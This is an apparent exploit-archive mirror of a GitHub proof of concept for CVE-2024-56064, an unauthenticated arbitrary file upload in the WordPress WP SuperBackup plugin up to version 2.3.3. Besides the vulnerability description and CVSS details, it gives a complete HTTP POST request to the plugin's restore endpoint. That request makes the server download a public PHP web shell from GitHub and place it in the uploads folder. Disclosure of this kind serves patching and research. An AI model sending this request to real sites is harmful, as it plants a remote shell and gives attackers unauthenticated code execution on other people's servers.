Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-56064 PoC — WordPress WP SuperBackup plugin <= 2.3.3 - Unauthenticated Arbitrary File Upload vulnerability

Source
https://github.com/RandomRobbieBF/CVE-2024-56064
Associated Vulnerability
Title:WordPress WP SuperBackup plugin <= 2.3.3 - Unauthenticated Arbitrary File Upload vulnerability (CVE-2024-56064)
Description:Unrestricted Upload of File with Dangerous Type vulnerability in azzaroco WP SuperBackup indeed-wp-superbackup allows Upload a Web Shell to a Web Server.This issue affects WP SuperBackup: from n/a through <= 2.3.3.
Description
WP SuperBackup <= 2.3.3 - Unauthenticated Arbitrary File Upload
Readme
# CVE-2024-56064
WP SuperBackup <= 2.3.3 - Unauthenticated Arbitrary File Upload

# Description

The Super Backup & Clone - Migrate for WordPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 2.3.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

## Details

- **Type**: plugin
- **Slug**: indeed-wp-superbackup
- **Affected Version**: 2.3.3
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-56064
- **Status**: Private

POC
---

Takes a while for the shell to appear.... it will appear in `/wp-content/uploads/isnapshots/shell.php`

```
POST /wp-admin/admin.php?page=ibk_admin&tab=restore HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal:8929/wp-admin/admin.php?page=ibk_admin&tab=restore
Content-Type: multipart/form-data; boundary=---------------------------24461452295617717774000608677
Content-Length: 688
Origin: http://kubernetes.docker.internal:8929
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="ibk_restore_migrate_action"

1
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_type"

restore_url
-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="restore_url"

https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php

-----------------------------24461452295617717774000608677
Content-Disposition: form-data; name="upload_file"; filename=""
Content-Type: application/octet-stream


-----------------------------24461452295617717774000608677--

```
File Snapshot

 [4.0K]  /data/pocs/d2c682cc3ed6222fb19d1b61354e924ad596bf0c
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →